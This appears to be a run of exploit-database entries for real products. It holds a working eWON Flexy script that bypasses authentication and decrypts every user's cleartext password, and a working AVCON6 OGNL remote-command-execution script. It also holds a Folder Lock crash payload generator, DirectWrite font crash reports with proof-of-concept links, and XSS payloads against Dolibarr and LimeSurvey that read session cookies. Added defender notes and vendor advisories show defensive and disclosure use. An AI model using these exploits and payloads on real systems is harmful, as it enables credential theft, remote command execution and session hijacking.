      print_error('Continuing under assumption you already checked...')
    else
      if admin_group
        print_good('Part of Administrators group! Continuing...')
      else
        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
      end
    end

    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
    end
  end
end
-
eWON Flexy - Authentication Bypass
#!/usr/bin/env python
'''
# Exploit Title: eWON v13.0 Authentication Bypass
# Date: 2018-10-12
# Exploit Author: Photubias – tijl[dot]Deneut[at]Howest[dot]be for www.ic4.be
# Vendor Advisory: [1] https://websupport.ewon.biz/support/news/support/ewon-security-enhancement-131s0-0
#                  [2] https://websupport.ewon.biz/support/news/support/ewon-security-vulnerability
# Vendor Homepage: https://www.ewon.biz
# Version: eWon Firmware 12.2 to 13.0
# Tested on: eWon Flexy with Firmware 13.0s0

    Copyright 2019 Photubias(c)

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.

    File name eWON-Flewy-Pwn.py
    written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be

    This script will perform retrieval of clear text credentials for an eWON Flexy router
    Tested on the eWON Flexy 201 with Firmware 13.0s0
    Only requires a valid username (default = adm) and this user must have the Rights 'View IO' & 'Change Configuration'
    It combines two vulnerabilities: authentication bypass (fixed in 13.1s0) and
    a weak password encryption, allowing cleartext password retrieval for all users (fixed in 13.3s0)
'''
# Python 2 only: urllib2, raw_input and integer `/` are relied on below.
username = 'adm'

import urllib2,urllib,base64,binascii,os

# Defender notes (see the docstring): getUserData() authenticates with a
# username and an EMPTY password, which the affected firmware accepted
# (fixed in 13.1s0), and the stored passwords are only XOR-obfuscated with
# the fixed key in decode() (fixed in 13.3s0). Requests to
# /wrcgi.bin/wsdReadForm whose Basic credential has an empty password are
# the thing to alert on; the firmware upgrade is the fix.

def decode(encpass):
    """Recover and print the clear-text password from an eWON-encoded one.

    encpass: the stored value, optionally prefixed with "#_<x>_" (the third
    underscore-separated field is then used). The value is base64, the last
    two bytes are discarded, and the rest is XORed nibble-by-nibble against
    xorString. Prints the result; returns nothing.
    """
    # Fixed 19-byte key (38 hex digits) shared by every device.
    xorString = "6414FE6F4C964746900208FC9B3904963A2F61"
    def convertPass(password):
        # `password` is a hex string, so len/2 is the byte count; 19 is the key length.
        if (len(password)/2) > 19:
            print('Error, password can not exceed 19 characters')
            exit()
        return hexxor(password, xorString[:len(password)])
    def hexxor(a, b):
        # XOR two equal-length hex strings one hex digit at a time.
        return "".join(["%x" % (int(x,16) ^ int(y,16)) for (x, y) in zip(a, b)])

    if encpass.startswith('#_'):
        encpass = encpass.split('_')[2]
    coded = base64.b64decode(encpass)
    codedhex = binascii.hexlify(coded)[:-4]
    clearpass = binascii.unhexlify(convertPass(codedhex))
    print('Decoded password: ' + clearpass)

def getUserData(userid, strIP):
    """Fetch the form fields for user slot `userid` from the device at strIP.

    Posts a wsdList naming the usr_* fields for that slot to
    /wrcgi.bin/wsdReadForm with Basic auth "<username>:" (empty password),
    then prints and decodes the password when a login name is present.
    NOTE(review): every path returns True, so the caller's "not getUserData"
    branch can never run and the loop always visits all 20 slots.
    """
    postwsdlist = '["inf_HasJVM","usr_FirstName|1","usr_LastName|1","usr_Login|1","usr_Password|1","usr_Information|1","usr_Right|1","usr_AccessPage|1","usr_AccessDir|1","usr_CBEn|1","usr_CBMode|1","usr_CBPhNum|1","ols_AllAndAssignedPageList","ols_DirList","ols_CBMode"]'
    postwsdlist = postwsdlist.replace('|1','|'+str(userid))
    postdata = {'wsdList' : postwsdlist}
    # Basic credential is "<username>:" with the base64 padding stripped.
    b64auth = base64.b64encode(username+':').replace('=','')
    result = urllib2.urlopen(urllib2.Request('http://'+strIP+'/wrcgi.bin/wsdReadForm',data=urllib.urlencode(postdata) ,headers={'Authorization' : ' Basic '+b64auth})).read()
    # The reply is split on '","'; 20 fields are expected for a populated slot.
    resultarr = result.split('","')
    if len(resultarr) == 20:
        fname = str(resultarr[1])
        lname = str(resultarr[2])
        usern = str(resultarr[3])
        if len(usern) == 0:
            return True
        encpassword = resultarr[4]
        print('Decoding pass for user: '+usern+' ('+fname+' '+lname+') ')
        decode(encpassword)
        print('---')
        return True
    else:
        return True

strIP = raw_input('Please enter an IP [10.0.0.53]: ')
if strIP == '':
    strIP = '10.0.0.53'
print('---')
for i in range(20):
    if not getUserData(i, strIP):
        print('### That\'s all folks ;-) ###')
        raw_input()
        exit(0)
raw_input('All Done')
-
AVCON6 systems management platform - OGNL Remote Command Execution
# Exploit Title: AVCON6 systems management platform - OGNL - Remote root command execution
# Date: 10/09/2018
# Exploit Author: Nassim Asrir
# Contact: [email protected] | https://www.linkedin.com/in/nassim-asrir-b73a57122/
# CVE: N\A
# Tested On: Windows 10(64bit) / 61.0b12 (64-bit)
# Thanks to: Otmane Aarab
# Example below:
# python ./rce.py http://server:8080/ id
# Testing Target: http://server:8080/
# uid=0(root) gid=0(root)
# Vendor: http://www.epross.com/
# About the product: The AVCON6 video conferencing system is the most complete set of systems, including multi-screen multi-split screens and systems that are integrated with H323/SIP protocol devices. High-end video conferencing
# software ideal for Room Base environments and performance requirements. Multi-party video conferencing can connect thousands of people at the same time.
# I am not responsible for any wrong use.
######################################################################################################
# NOTE(review): the shebang below is not on the first line of the file, so
# it has no effect; the script is Python 2 (urllib2, httplib, `except X, e`).
#!/usr/bin/python
# -*- coding: utf-8 -*-

import urllib2
import httplib

# Defender notes: the request goes to login.action with a `redirect:` action
# prefix whose value is an OGNL expression (the %23context /
# com.opensymphony.xwork2 references mark the framework in use). A query
# string to a *.action endpoint containing `redirect:` followed by `${` is
# the pattern to block or alert on; no authentication is involved.

def exploit(url, cmd):
    """Send `cmd` to the target via the OGNL redirect: parameter and print the reply.

    url: base URL ending in '/' (the payload is appended as a relative path).
    cmd: the command string; it is spliced into the expression unencoded, so
         quotes or spaces in it break the request rather than being escaped.
    Returns the response body (or the partial body on IncompleteRead).
    """
    payload = 'login.action?redirect:'
    payload += '${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22'+cmd+'%22})).'
    payload += 'start(),%23b%3d%23a.getInputStream(),'
    payload += '%23c%3dnew%20java.io.InputStreamReader(%23b),'
    payload += '%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d'
    payload += '.read(%23e),%23matt%3d%23context.'
    payload += 'get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),'
    payload += '%23matt.getWriter().println(%23e),%23matt.'
    payload += 'getWriter().flush(),%23matt.getWriter()'
    payload += '.close()}'
    try:
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'}
        request = urllib2.Request(url+payload, headers=headers)
        page = urllib2.urlopen(request).read()
    # The server closes the stream early; keep whatever was received.
    except httplib.IncompleteRead, e:
        page = e.partial
    print(page)
    return page

if __name__ == '__main__':
    import sys
    if len(sys.argv) != 3:
        # NOTE(review): the usage text names a different script; it looks copied.
        print("[*] struts2_S2-045.py http://target/ id")
    else:
        print('[*] Avcon6-Preauh-Remote Command Execution')
        url = sys.argv[1]
        cmd = sys.argv[2]
        print("[*] Executed Command: %s\n" % cmd)
        print("[*] Target: %s\n" % url)
        exploit(url, cmd)
-
Microsoft DirectWrite - Invalid Read in SplicePixel While Processing OTF Fonts
Microsoft DirectWrite is a modern Windows API for high-quality text rendering. A majority of its code resides in the DWrite.dll user-mode library. It is used by a variety of widely used desktop programs (such as the Chrome, Firefox and Edge browsers) and constitutes an attack surface for memory corruption bugs, as it performs the processing of untrusted font files and is written in C/C++. Through fuzzing, we have discovered a crash caused by an invalid memory read in DWrite!SplicePixel, while rasterizing the glyphs of a slightly malformed OpenType font. The problem reproduces in all major browsers; below is a crash log from the Microsoft Edge renderer process, generated when trying to open a web page with the proof-of-concept font embedded: --- cut --- (281c.25d4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. DWrite!SplicePixel+0x14b: 00007fff`b8634473 488b14f0 mov rdx,qword ptr [rax+rsi*8] ds:00000227`c62d95b0=???????????????? 0:031> u DWrite!SplicePixel+0x14b: 00007fff`b8634473 488b14f0 mov rdx,qword ptr [rax+rsi*8] 00007fff`b8634477 4885d2 test rdx,rdx 00007fff`b863447a 7474 je DWrite!SplicePixel+0x1c8 (00007fff`b86344f0) 00007fff`b863447c 458d4b01 lea r9d,[r11+1] 00007fff`b8634480 8b4208 mov eax,dword ptr [rdx+8] 00007fff`b8634483 413bc1 cmp eax,r9d 00007fff`b8634486 7f68 jg DWrite!SplicePixel+0x1c8 (00007fff`b86344f0) 00007fff`b8634488 488b0a mov rcx,qword ptr [rdx] 0:031> ? rax Evaluate expression: 2369851854688 = 00000227`c62d8f60 0:031> ? rsi Evaluate expression: 202 = 00000000`000000ca 0:031> dd rax 00000227`c62d8f60 ???????? ???????? ???????? ???????? 00000227`c62d8f70 ???????? ???????? ???????? ???????? 00000227`c62d8f80 ???????? ???????? ???????? ???????? 00000227`c62d8f90 ???????? ???????? ???????? ???????? 00000227`c62d8fa0 ???????? ???????? ???????? ???????? 00000227`c62d8fb0 ???????? ???????? ???????? ???????? 00000227`c62d8fc0 ???????? 
???????? ???????? ???????? 00000227`c62d8fd0 ???????? ???????? ???????? ???????? 0:031> k # Child-SP RetAddr Call Site 00 000000b4`ceaebe00 00007fff`b8634306 DWrite!SplicePixel+0x14b 01 000000b4`ceaebe50 00007fff`b8633325 DWrite!SetPixelInDropOut+0x9a 02 000000b4`ceaebe90 00007fff`b86322a8 DWrite!FillInInflection+0xcd 03 000000b4`ceaebf00 00007fff`b863281b DWrite!DoXInflections+0x118 04 000000b4`ceaebf40 00007fff`b86319ca DWrite!EditBlackSpace+0x29f 05 000000b4`ceaebfa0 00007fff`b8636118 DWrite!CScan+0x72 06 000000b4`ceaebff0 00007fff`b855b1b2 DWrite!CScanFill+0x204 07 000000b4`ceaec0e0 00007fff`b848ccef DWrite!DoType1InterpretCharString+0xcd77a 08 000000b4`ceaec790 00007fff`b862ea16 DWrite!Type1InterpretCharString+0x163 09 000000b4`ceaec880 00007fff`b862dd49 DWrite!BuildRuns+0x186 0a 000000b4`ceaec9b0 00007fff`b862b2b9 DWrite!ATMBuildBitMap+0xb9 0b 000000b4`ceaeca80 00007fff`b85b88b7 DWrite!AdobeInternalGetBitmap+0x31d 0c 000000b4`ceaecd20 00007fff`b85b877a DWrite!CffRasterizer::Implementation::GetBitmap+0x11f 0d 000000b4`ceaece60 00007fff`b84e2c89 DWrite!CffRasterizer::GetBitmap+0x2a 0e 000000b4`ceaecea0 00007fff`b84b1754 DWrite!GlyphBitmapRasterizationState::RasterizeGlyph+0x111 0f 000000b4`ceaecee0 00007fff`c8e3e1ce DWrite!DWriteGlyphLookupCache::GetGlyphBitmapInfo+0x264 10 000000b4`ceaed150 00007fff`c8e3e95f d2d1!GlyphRunAnalyzer::AddCachedGlyph+0x62 11 000000b4`ceaed200 00007fff`c8e460b0 d2d1!GlyphRunAnalyzer::GetGlyphs+0x18f 12 000000b4`ceaed250 00007fff`c8e5572d d2d1!GlyphRunRenderer::InitForRendering+0x2c0 13 000000b4`ceaed390 00007fff`c8ebffe4 d2d1!CHwSurfaceRenderTarget::DrawGlyphRun+0x38d 14 000000b4`ceaed6a0 00007fff`c8e5379e d2d1!BrushRedirectionCompatibleCommand<CCommand_DrawGlyphRun,0>::Execute+0x134 15 000000b4`ceaed7b0 00007fff`c8e6e7ef d2d1!CHwSurfaceRenderTarget::ProcessBatch+0x3ce 16 000000b4`ceaed860 00007fff`c8e6a0ae d2d1!CBatchSerializer::FlushInternal+0x13f 17 000000b4`ceaed8f0 00007fff`c8e6143b d2d1!DrawingContext::Flush+0x96 18 
000000b4`ceaed950 00007fff`9dba551e d2d1!D2DDeviceContextBase<ID2D1DeviceContext6,ID2D1DeviceContext6,null_type>::EndDraw+0x13b 19 000000b4`ceaeda90 00007fff`9da3a704 edgehtml!CDXRenderTarget::EndDrawD2D+0x66 1a 000000b4`ceaedac0 00007fff`9da3a4e8 edgehtml!CDXRenderTarget::EnsureRenderMode+0x184 1b 000000b4`ceaedaf0 00007fff`9db9db85 edgehtml!CDXRenderTarget::EndDraw+0x38 1c 000000b4`ceaedb40 00007fff`9db9da0b edgehtml!CDispSurface::EndLayerToRenderTarget+0x145 1d 000000b4`ceaedbe0 00007fff`9da2585f edgehtml!CDispNodeDestination::EndRender+0x6b 1e 000000b4`ceaedc50 00007fff`9db660c1 edgehtml!CDispNodeDestination::EndRect+0xaf 1f 000000b4`ceaedc90 00007fff`9da1cf83 edgehtml!CDispDestinationDrawHelper::EndRect+0x31 20 000000b4`ceaedcc0 00007fff`9d9de055 edgehtml!CDispContainer::DrawSelfContent+0x583 21 000000b4`ceaede30 00007fff`9d9df37e edgehtml!CDispContainer::DrawSelf+0x365 22 000000b4`ceaedfc0 00007fff`9da1ee43 edgehtml!CDispNode::DrawInternal+0x7ce 23 000000b4`ceaee350 00007fff`9da1d747 edgehtml!CDispNode::Draw+0x943 24 000000b4`ceaee560 00007fff`9da1d297 edgehtml!CDispContainer::DrawChildren+0x227 25 000000b4`ceaee620 00007fff`9da1cbc8 edgehtml!CDispContainer::DrawSelfContentFullStackingContext+0x127 26 000000b4`ceaee710 00007fff`9d9de055 edgehtml!CDispContainer::DrawSelfContent+0x1c8 27 000000b4`ceaee880 00007fff`9d9df37e edgehtml!CDispContainer::DrawSelf+0x365 28 000000b4`ceaeea10 00007fff`9da1ead3 edgehtml!CDispNode::DrawInternal+0x7ce 29 000000b4`ceaeeda0 00007fff`9da2a8fc edgehtml!CDispNode::Draw+0x5d3 2a 000000b4`ceaeefb0 00007fff`9da29b68 edgehtml!CDispRoot::DrawIndependentCompositionLayerTree+0x5c 2b 000000b4`ceaef0a0 00007fff`9da297f5 edgehtml!CDispRoot::DrawRoot+0x1b8 2c 000000b4`ceaef2f0 00007fff`9daa452c edgehtml!CPaintHandler::RenderInternal+0x2b5 2d 000000b4`ceaef870 00007fff`9d9c4ac8 edgehtml!CPaintHandler::RenderIfNeeded+0x7c 2e 000000b4`ceaef8e0 00007fff`9dbaa80d edgehtml!CRenderThread::ProcessRenderWork+0xdc 2f 000000b4`ceaef940 
00007fff`9dacfdb9 edgehtml!CRenderTaskDrawInPlace::Execute+0xad 30 000000b4`ceaef9b0 00007fff`9dbe7542 edgehtml!CRenderThread::RenderThread+0x229 31 000000b4`ceaefa50 00007fff`cec537e4 edgehtml!CRenderThread::StaticRenderThreadProc+0x42 32 000000b4`ceaefa80 00007fff`cf5bcb81 KERNEL32!BaseThreadInitThunk+0x14 33 000000b4`ceaefab0 00000000`00000000 ntdll!RtlUserThreadStart+0x21 --- cut --- We have minimized the test case to a single-byte difference in relation to the original file. When decompiled with the "ttx" utility from the fontTools package, the difference becomes obvious: it's a change of one of the FontMatrix values inside the CFF table. Original data: <FontMatrix value="0.001 0.0 0.000123 0.001 0.0 0.0"/> Mutated data: <FontMatrix value="0.001 2000000.0 0.000123 0.001 0.0 0.0"/> The issue reproduces on a fully updated Windows 7 and Windows 10 1709; we haven't tested other versions of the system. It could be potentially used to disclose sensitive data from the process address space. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. Attached are the minimized PoC font, original font, an HTML file to reproduce the bug in a browser, and 3 extra non-minimized samples which also trigger the crash. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47381.zip
-
Folder Lock 7.7.9 - Denial of Service
# Exploit Title: Folder Lock v7.7.9 Denial of Service Exploit
# Date: 12.09.2019
# Vendor Homepage:https://www.newsoftwares.net/folderlock/
# Software Link: https://www.newsoftwares.net/download/folderlock7-en/folder-lock-en.exe
# Exploit Author: Achilles
# Tested Version: 7.7.9
# Tested on: Windows 7 x64
# 1.- Run python code :Folder_Lock.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Folderlock and Click 'Enter Key'
# 4.- Paste the content of EVIL.txt into the Field: 'Serial Number and Registration Key'
# 5.- Click 'Submit' and you will see a crash.

# NOTE(review): the shebang is not on line 1, so it is inert; the `print`
# statements make this Python 2 only.
#!/usr/bin/env python

# Writes 6000 'A' bytes to Evil.txt for pasting into the registration field
# (a crash on an over-long input field; the page reports nothing beyond the
# crash itself). Note the steps above say "EVIL.txt" while the code writes
# "Evil.txt" — identical on the case-insensitive Windows filesystem tested.
buffer = "\x41" * 6000
try:
    f=open("Evil.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
# NOTE(review): the bare except hides the actual OS error and, when write()
# fails, the handle is never closed; a `with open(...)` block would fix both.
except:
    print "File cannot be created"
-
Microsoft DirectWrite - Out-of-Bounds Read in sfac_GetSbitBitmap While Processing TTF Fonts
Microsoft DirectWrite is a modern Windows API for high-quality text rendering. A majority of its code resides in the DWrite.dll user-mode library. It is used by a variety of widely used desktop programs (such as web browsers) and constitutes an attack surface for memory corruption bugs, as it performs the processing of untrusted font files and is written in C/C++. Through fuzzing, we have discovered a crash caused by an invalid memory read in DWrite!sfac_GetSbitBitmap, while rasterizing the glyphs of a slightly malformed TrueType font. The problem reproduces in Microsoft Edge (supposedly not in Chrome and Firefox due to OpenType Sanitizer); below is a crash log from the Microsoft Edge renderer process, generated when trying to open a web page with the proof-of-concept font embedded: --- cut --- (4368.698c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. DWrite!sfac_GetSbitBitmap+0x2ad: 00007ffe`b1ce47bd 410fb65500 movzx edx,byte ptr [r13] ds:000001b9`94823000=?? 
0:036> u DWrite!sfac_GetSbitBitmap+0x2ad: 00007ffe`b1ce47bd 410fb65500 movzx edx,byte ptr [r13] 00007ffe`b1ce47c2 0811 or byte ptr [rcx],dl 00007ffe`b1ce47c4 49ffc5 inc r13 00007ffe`b1ce47c7 48ffc1 inc rcx 00007ffe`b1ce47ca 66413bc3 cmp ax,r11w 00007ffe`b1ce47ce 7471 je DWrite!sfac_GetSbitBitmap+0x331 (00007ffe`b1ce4841) 00007ffe`b1ce47d0 66ffc0 inc ax 00007ffe`b1ce47d3 ebd1 jmp DWrite!sfac_GetSbitBitmap+0x296 (00007ffe`b1ce47a6) 0:036> k # Child-SP RetAddr Call Site 00 000000a3`a00ec740 00007ffe`b1ce3aaa DWrite!sfac_GetSbitBitmap+0x2ad 01 000000a3`a00ec840 00007ffe`b1ce3954 DWrite!GetSbitComponent+0xfe 02 000000a3`a00ec950 00007ffe`b1d4cc66 DWrite!sbit_GetBitmap+0xd0 03 000000a3`a00eca10 00007ffe`b1d43dfe DWrite!fs_ContourScan+0x3b6 04 000000a3`a00ecaf0 00007ffe`b1d43e98 DWrite!TrueTypeRasterizer::Implementation::GetBitmapInternal+0xe6 05 000000a3`a00ecb40 00007ffe`b1d42c03 DWrite!TrueTypeRasterizer::Implementation::GetBitmap+0x30 06 000000a3`a00ecbb0 00007ffe`b1d11754 DWrite!GlyphBitmapRasterizationState::RasterizeGlyph+0x8b 07 000000a3`a00ecbf0 00007ffe`bf4de1ce DWrite!DWriteGlyphLookupCache::GetGlyphBitmapInfo+0x264 08 000000a3`a00ece60 00007ffe`bf4de95f d2d1!GlyphRunAnalyzer::AddCachedGlyph+0x62 09 000000a3`a00ecf10 00007ffe`bf4e60b0 d2d1!GlyphRunAnalyzer::GetGlyphs+0x18f 0a 000000a3`a00ecf60 00007ffe`bf4f572d d2d1!GlyphRunRenderer::InitForRendering+0x2c0 0b 000000a3`a00ed0a0 00007ffe`bf55ffe4 d2d1!CHwSurfaceRenderTarget::DrawGlyphRun+0x38d 0c 000000a3`a00ed3b0 00007ffe`bf4f379e d2d1!BrushRedirectionCompatibleCommand<CCommand_DrawGlyphRun,0>::Execute+0x134 0d 000000a3`a00ed4c0 00007ffe`bf50e7ef d2d1!CHwSurfaceRenderTarget::ProcessBatch+0x3ce 0e 000000a3`a00ed570 00007ffe`bf50a0ae d2d1!CBatchSerializer::FlushInternal+0x13f 0f 000000a3`a00ed600 00007ffe`bf50143b d2d1!DrawingContext::Flush+0x96 10 000000a3`a00ed660 00007ffe`99d3551e d2d1!D2DDeviceContextBase<ID2D1DeviceContext6,ID2D1DeviceContext6,null_type>::EndDraw+0x13b 11 000000a3`a00ed7a0 00007ffe`99bca704 
edgehtml!CDXRenderTarget::EndDrawD2D+0x66 12 000000a3`a00ed7d0 00007ffe`99bca4e8 edgehtml!CDXRenderTarget::EnsureRenderMode+0x184 13 000000a3`a00ed800 00007ffe`99d2db85 edgehtml!CDXRenderTarget::EndDraw+0x38 14 000000a3`a00ed850 00007ffe`99d2da0b edgehtml!CDispSurface::EndLayerToRenderTarget+0x145 15 000000a3`a00ed8f0 00007ffe`99bb585f edgehtml!CDispNodeDestination::EndRender+0x6b 16 000000a3`a00ed960 00007ffe`99cf60c1 edgehtml!CDispNodeDestination::EndRect+0xaf 17 000000a3`a00ed9a0 00007ffe`99bacf83 edgehtml!CDispDestinationDrawHelper::EndRect+0x31 18 000000a3`a00ed9d0 00007ffe`99b6e055 edgehtml!CDispContainer::DrawSelfContent+0x583 19 000000a3`a00edb40 00007ffe`99b6f37e edgehtml!CDispContainer::DrawSelf+0x365 1a 000000a3`a00edcd0 00007ffe`99baee43 edgehtml!CDispNode::DrawInternal+0x7ce 1b 000000a3`a00ee060 00007ffe`99bad747 edgehtml!CDispNode::Draw+0x943 1c 000000a3`a00ee270 00007ffe`99bad297 edgehtml!CDispContainer::DrawChildren+0x227 1d 000000a3`a00ee330 00007ffe`99bacbc8 edgehtml!CDispContainer::DrawSelfContentFullStackingContext+0x127 1e 000000a3`a00ee420 00007ffe`99b6e055 edgehtml!CDispContainer::DrawSelfContent+0x1c8 1f 000000a3`a00ee590 00007ffe`99b6f37e edgehtml!CDispContainer::DrawSelf+0x365 20 000000a3`a00ee720 00007ffe`99baead3 edgehtml!CDispNode::DrawInternal+0x7ce 21 000000a3`a00eeab0 00007ffe`99bba8fc edgehtml!CDispNode::Draw+0x5d3 22 000000a3`a00eecc0 00007ffe`99bb9b68 edgehtml!CDispRoot::DrawIndependentCompositionLayerTree+0x5c 23 000000a3`a00eedb0 00007ffe`99bb97f5 edgehtml!CDispRoot::DrawRoot+0x1b8 24 000000a3`a00ef000 00007ffe`99c3452c edgehtml!CPaintHandler::RenderInternal+0x2b5 25 000000a3`a00ef580 00007ffe`99b54ac8 edgehtml!CPaintHandler::RenderIfNeeded+0x7c 26 000000a3`a00ef5f0 00007ffe`99d3a80d edgehtml!CRenderThread::ProcessRenderWork+0xdc 27 000000a3`a00ef650 00007ffe`99c5fdb9 edgehtml!CRenderTaskDrawInPlace::Execute+0xad 28 000000a3`a00ef6c0 00007ffe`99d77542 edgehtml!CRenderThread::RenderThread+0x229 29 000000a3`a00ef760 
00007ffe`c32937e4 edgehtml!CRenderThread::StaticRenderThreadProc+0x42 2a 000000a3`a00ef790 00007ffe`c5e1cb81 KERNEL32!BaseThreadInitThunk+0x14 2b 000000a3`a00ef7c0 00000000`00000000 ntdll!RtlUserThreadStart+0x21 --- cut --- We have minimized the test cases to a 1-byte difference in the EBLC table, and a 2-byte difference in the EBDT table in relation to the original files. The issue reproduces on a fully updated Windows 10 1709; we haven't tested other versions of the system. It could be used to disclose sensitive data from the process address space, which is clearly visible when opening the PoC HTML files in Edge. In most cases, instead of crashing, the browser will display random chunks of heap memory residing after the glyph's bitmap allocation. As shown in 1/poc.html and 2/poc.html, the problems are related to glyphs corresponding to characters with codes 0xF0 and 0x2020, respectively. Attached is a pair of minimized PoC fonts, original fonts, and HTML files to reproduce the bug in a browser. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47382.zip
-
Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting
# Exploit Title: Dolibarr ERP/CRM 10.0.1 - User-Agent Http Header Cross Site Scripting # Exploit Author: Metin Yunus Kandemir (kandemir) # Vendor Homepage: https://www.dolibarr.org/ # Software Link: https://www.dolibarr.org/downloads # Version: 10.0.1 # Category: Webapps # Tested on: Xampp for Linux # CVE: CVE-2019-16197 # Software Description : Dolibarr ERP & CRM is a modern and easy to use software package to manage your business... ================================================================== Description: In htdocs/societe/card.php in Dolibarr 10.0.1, the value of the User-Agent HTTP header is copied into the HTML document as plain text between tags, leading to XSS. GET /dolibarr-10.0.1/htdocs/societe/card.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0ab<script>alert("XSS")</script>
-
LimeSurvey 3.17.13 - Cross-Site Scripting
SEC Consult Vulnerability Lab Security Advisory < 20190912-0 > ======================================================================= title: Stored and reflected XSS vulnerabilities product: LimeSurvey vulnerable version: <= 3.17.13 fixed version: =>3.17.14 CVE number: CVE-2019-16172, CVE-2019-16173 impact: medium homepage: https://www.limesurvey.org/ found: 2019-08-23 by: Andreas Kolbeck (Office Munich) David Haintz (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "LimeSurvey is the tool to use for your online surveys. Whether you are conducting simple questionnaires with just a couple of questions or advanced assessments with conditionals and quota management, LimeSurvey has got you covered. LimeSurvey is 100% open source and will always be transparently developed. We can help you reach your goals." Source: https://www.limesurvey.org/ Business recommendation: ------------------------ LimeSurvey suffered from a vulnerability due to improper input and output validation. By exploiting this vulnerability an attacker could: 1. Attack other users of the web application with JavaScript code, browser exploits or Trojan horses, or 2. perform unauthorized actions in the name of another logged-in user. The vendor provides a patch which should be installed immediately. Furthermore, a thorough security analysis is highly recommended as only a short spot check has been performed and additional issues are to be expected. Vulnerability overview/description: ----------------------------------- 1) Stored and reflected XSS vulnerabilities LimeSurvey suffers from a stored and reflected cross-site scripting vulnerability, which allows an attacker to execute JavaScript code with the permissions of the victim. 
In this way it is possible to escalate privileges from a low-privileged account e.g. to "SuperAdmin". Proof of concept: ----------------- 1) Stored and reflected XSS vulnerabilities Example 1 - Stored XSS (CVE-2019-16172): The attacker needs the appropriate permissions in order to create new survey groups. Then create a survey group with a JavaScript payload in the title, for example: test<svg/onload=alert(document.cookie)> When the survey group is being deleted, e.g. by an administrative user, the JavaScript code will be executed as part of the "success" message. Example 2 - Reflected XSS (CVE-2019-16173): The following proof of concept prints the current CSRF token cookie which contains the CSRF token. The parameter "surveyid" is not filtered properly: http://$host/index.php/admin/survey?mandatory=1&sid=xxx&surveyid=xxx%22%3E%3Cimg%20 src=x%20onerror=%22alert(document.cookie)%22%3E&sa=listquestions&sort=question If the URL schema is configured differently the following payload works: http://$host/index.php?r=admin/survey&mandatory=1&sid=xxx&surveyid= xxx"><img%20src=x%20onerror="alert(document.cookie)">&sa=listquestions&sort=question Vulnerable / tested versions: ----------------------------- The vulnerabilities have been verified to exist in version 3.17.9 and the latest version 3.17.13. It is assumed that older versions are affected as well. 
Vendor contact timeline: ------------------------ 2019-08-29: Contacting vendor through https://bugs.limesurvey.org/view.php?id=15204 2019-09-02: Fixes available: https://github.com/LimeSurvey/LimeSurvey/commit/32d6a5224327b246ee3a2a08500544e4f80f9a9a https://github.com/LimeSurvey/LimeSurvey/commit/f1c1ad2d24eb262363511fcca2e96ce737064006 2019-09-02: Release of LimeSurvey v3.17.14 which fixes the security issues 2019-09-03: Release of LimeSurvey v3.17.15 bug fix 2019-09-12: Coordinated release of security advisory Solution: --------- Update to version 3.17.15 or higher: https://www.limesurvey.org/stable-release The vendor provides a detailed list of changes here: https://www.limesurvey.org/limesurvey-updates/2188-limesurvey-3-17-14-build-190902-released Workaround: ----------- No workaround available. Advisory URL: ------------- https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html Interested in improving your cyber security with the experts of SEC Consult? 
Contact our local offices https://www.sec-consult.com/en/contact/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF A. Kolbeck / @2019
-
phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery
